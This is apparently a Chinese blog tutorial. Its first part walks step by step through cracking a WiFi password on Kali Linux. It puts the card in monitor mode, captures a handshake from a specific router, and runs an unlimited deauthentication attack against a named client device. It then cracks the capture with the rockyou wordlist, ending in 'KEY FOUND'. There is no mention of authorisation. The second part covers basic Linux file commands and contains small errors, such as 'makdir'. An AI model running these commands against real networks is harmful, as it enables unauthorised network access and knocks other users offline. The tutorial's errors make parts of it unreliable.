文章目录
- 1. kali破解wifi密码
- 第一步
- 第二步
- 第三步
- 第四步
- 第五步
- 第六步
- 第七步
- 第八步
- 第九步
- 2. linux命令的基础操作
- 2.1 创建文件
- 2.2 创建文件夹
- 2.3 删除文件
- 2.4 移动文件
- 2.5 复制文件
- 2.6 跳转,显示详情
- 2.7 vim输入
1. kali破解wifi密码
第一步
插入无线网卡,连接到虚拟机。
ifconfig
- 看是否出现wlan0
第二步
airmon-ng start wlan0
- 开启网卡监听模式
第三步
iwconfig
- 检验,出现wlan0mon则成功
第四步
airodump-ng wlan0mon
- 扫描
- BSSID为wifi的MAC地址
- PWR为信号强弱程度,数值越小信号越强
- DATA为数据量,越大使用的人就越多
- CH为信道频率(频道)
- ESSID为wifi的名称,中文可能会有乱码
第五步
airodump-ng -c 1 -w /home/cbb/桌面/实战项目/实战2-破解wifi密码/test --bssid 7A:F5:8D:B4:BA:B2 wlan0mon
- airodump-ng -c <AP信道> -w <抓取握手包后存放位置名称> --bssid <AP的mac地址> <interface名称>
第六步
- 解除认证攻击
- 保持命令窗口处于运行状态,再打开一个新的命令窗口,进行解除认证攻击,即强制连接到目的wifi路由的设备重新连接。
aireplay-ng -0 0 -a 7A:F5:8D:B4:BA:B2 -c 04:6c:59:97:F4:D2 wlan0mon
-
aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
-
带破解的wifi的mac : 7A:F5:8D:B4:BA:B2
-
用这个wifi的用户 : 04:6c:59:97:F4:D2
-
出现 : WPA handshake成功
第七步
airmon-ng stop wlan0mon
- 关闭监听
第八步
gzip -d /usr/share/wordlists/rockyou.txt.gz
- 解压字典
第九步
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 7A:F5:8D:B4:BA:B2 test-01.cap
- aircrack-ng -w <指定字典> -b <目的路由MAC地址> <抓到的握手包>
爆破
KEY FOUND! [ 12345678 ]
2. linux命令的基础操作
2.1 创建文件
- 法一:
touch test.txt
- 法二:
vi test.txt 或 vim test.txt
- 这样创建的文件,只可读。
- 或者只可以用vim来编辑
- vim输入在后面讲。
- 法3:
echo > test.txt
- echo xxx内容 >
- 这样可以直接输入内容。
2.2 创建文件夹
makdir abc
2.3 删除文件
rm -f test.txt
- rm就是删除的意思。
- -f意思是删除不提醒。
2.4 移动文件
mv test.txt abc
- mv 待移动的文件或文件夹 移到的目的文件夹
2.5 复制文件
- 把mv 改成 cp
2.6 跳转,显示详情
- 跳转到home文件夹
cd /home
- 显示home文件夹里面的内容
ls
2.7 vim输入
- 按 “ i ” 进入编辑模式。
- 英文状态下,按 Esc ,在输入 “:wq” 保存退出。